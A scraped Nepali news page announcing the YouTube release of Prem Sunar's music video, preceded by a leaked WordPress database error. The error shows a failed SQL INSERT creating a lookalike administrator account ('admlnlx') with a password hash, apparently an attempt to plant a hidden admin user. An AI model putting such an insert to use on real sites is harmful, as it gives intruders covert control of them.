WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrXRl66DFrEcBo3imf/mIovJBkrEpb0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 23:48:23', '', 'admlnlx', 'admlnlx')

प्रेम सुनारको स्कुटिमा चढिछेउ सार्वजनिक (भिडियो सहित) – Gaule Khabar

प्रेम सुनारको स्कुटिमा चढिछेउ सार्वजनिक (भिडियो सहित)

प्रेम सुनारको स्कुटिमा चढिछेउ सार्वजनिक (भिडियो सहित)

गाउँले न्युज, काठमाण्डौं । गायक प्रेम सुनारको स्कुटिमा चढिछेउ बोलको गीतको म्युजिक भिडियो युटुबमा सार्वजनिक भएको छ ।

गाउँले ईन्टरटेनमेन्ट मिडिया ग्रुपको पोष्ट प्रोडक्सनमा निमार्ण भएको म्युजिक भिडियोमा श्रीशक्ति बराईली, सविना तमाङ, मदन थापा र बिक्रम गौतमको फिचरिङ हेर्नसकिने छ ।
मदन कुमार थापा र श्रीशक्ति बराईलीको निर्देशन गंगाराम राईको छयाङ्कन र संम्पादन रहेको उक्त म्युजिक भिडियो गाउँले इन्टरटेनमेन्टको युटुब च्यानलबाट सार्वजनिक गरिएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका